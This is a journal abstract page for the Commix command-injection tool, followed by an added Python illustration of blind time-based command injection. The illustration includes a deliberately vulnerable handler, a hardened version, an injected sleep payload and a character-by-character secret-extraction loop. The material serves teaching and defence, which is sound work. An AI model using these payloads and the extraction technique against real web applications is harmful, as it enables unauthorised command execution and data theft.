International Journal of Information Security, Volume 18, Issue 1, pp 49–72

Commix: automating evaluation and exploitation of command injection vulnerabilities in Web applications

  • Anastasios Stasinopoulos
  • Christoforos Ntantogian (corresponding author)
  • Christos Xenakis
Regular Contribution


Abstract

Despite the prevalence and the high impact of command injection attacks, little attention has been given by the research community to this type of code injection. Although there are many software tools to detect and exploit other types of code injection, such as SQL injection or cross-site scripting, there is no dedicated, specialized software that automatically detects and exploits command injection vulnerabilities. This paper proposes an open-source tool that automates the process of detecting and exploiting command injection flaws in Web applications, named COMMand Injection eXploiter (Commix). We present and elaborate on the software architecture and the detection engine of Commix, as well as its extra functionalities that greatly facilitate penetration testers and security researchers in the detection and exploitation of command injection vulnerabilities. Moreover, based on the knowledge and practical experience gained from the development of Commix, we propose and analyze newly identified techniques that perform side-channel exploitation of command injections, allowing an attacker to indirectly deduce the output of the executed command (i.e., blind command injection). Furthermore, we evaluate the detection capabilities of Commix by performing experiments against various applications. The experimental results show that Commix presents high detection accuracy while false positives are eliminated. Finally, and most importantly, we analyze several 0-day command injection vulnerabilities that Commix detected in real-world applications. Despite the short time since its release, Commix has been embraced by the security community and comes preinstalled in many security-oriented operating systems, including the well-known Kali Linux.
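
The blind, side-channel exploitation that the abstract describes, worked through end to end as an added example that is not code from the paper or from the Commix project: a deliberately vulnerable request handler built in the shell_exec("... " . $_GET["host"]) concatenation pattern, a hardened counterpart that allow-lists the parameter and passes it as an argv element, a time-based detection probe, and a character-by-character extraction loop that recovers command output the application never returns in its response. The secret value, the `echo` that stands in for the real command so the example runs offline, the candidate alphabet and the one-second delay are all assumptions constructed for this illustration.

```python
"""Blind (time-based) command injection, simulated end to end.

Added illustration, not code from the Commix project: a deliberately
vulnerable request handler, a hardened one, a time-based detection probe
and a character-by-character extraction loop that recovers command output
the application never sends back to the client.
"""
import os
import re
import subprocess
import time

# Constructed stand-in for data the injected command can read on the server
# but that the HTTP response never shows (the "blind" case). It is exposed to
# the shell as $SECRET so the payloads below can inspect it.
SECRET = "k3y"
SERVER_ENV = {"SECRET": SECRET, "PATH": os.environ.get("PATH", "/usr/bin:/bin")}

# Candidate characters tried at each position (an assumption of the example);
# extraction stops at the first position where no candidate matches.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def vulnerable_lookup(host: str) -> str:
    """Deliberately vulnerable handler, kept vulnerable on purpose.

    The request parameter is concatenated into a shell command line, the
    pattern of PHP's shell_exec("ping -c 1 " . $_GET["host"]); `echo` stands
    in for ping so the example runs offline. Output is discarded, so the
    attacker learns nothing from the response body and must use a side channel.
    """
    subprocess.run("echo " + host, shell=True, env=SERVER_ENV,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                   timeout=10)
    return "ok"


HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def hardened_lookup(host: str) -> str:
    """Hardened handler: allow-list the parameter, then pass it as a single
    argv element so no shell ever parses it (metacharacters become inert)."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid hostname")
    subprocess.run(["echo", host], env=SERVER_ENV,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                   timeout=10)
    return "ok"


def probe(handler, shell_test: str, delay: int = 1, threshold: float = 0.5) -> bool:
    """Time-based oracle: append a conditional sleep and infer the truth of
    `shell_test` from the response time. A handler that rejects the payload,
    or never hands it to a shell, produces no delay."""
    payload = f"x; if {shell_test}; then sleep {delay}; fi"
    started = time.monotonic()
    try:
        handler(payload)
    except ValueError:
        return False
    return time.monotonic() - started >= threshold


def is_time_injectable(handler) -> bool:
    """Detection step: an unconditionally true test must produce the delay."""
    return probe(handler, "true")


def extract_blind(handler, max_len: int = 16) -> str:
    """Exploitation step: recover $SECRET one character at a time by asking
    yes/no questions through the timing side channel."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            test = f'[ "$(printf %s "$SECRET" | cut -c{pos})" = "{ch}" ]'
            if probe(handler, test):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the hidden string
    return recovered


if __name__ == "__main__":
    for name, h in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        print(name, "injectable:", is_time_injectable(h), "leaked:", repr(extract_blind(h)))
```

Against a real target the delay and threshold have to be calibrated against the endpoint's baseline response time, otherwise a slow server is reported as injectable; the detection probe should be repeated with the delay varied to confirm that the response time tracks the injected sleep. The hardened handler combines two independent controls: the allow-list rejects the payload outright, and the argv form means that even an input which slipped past the pattern would reach `echo` as a literal argument rather than be parsed by a shell.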


Keywords: Command injection, Code injection, Exploitation, Software tool, Web security



This research has been funded by the ReCRED project (Horizon H2020 Framework Programme of the European Union under GA number 653417).

Copyright information

© Springer-Verlag GmbH Germany, part of Springer Nature 2018

Authors and Affiliations

  • Anastasios Stasinopoulos (1)
  • Christoforos Ntantogian (1), corresponding author
  • Christos Xenakis (1)
  1. Department of Digital Systems, University of Piraeus, Piraeus, Greece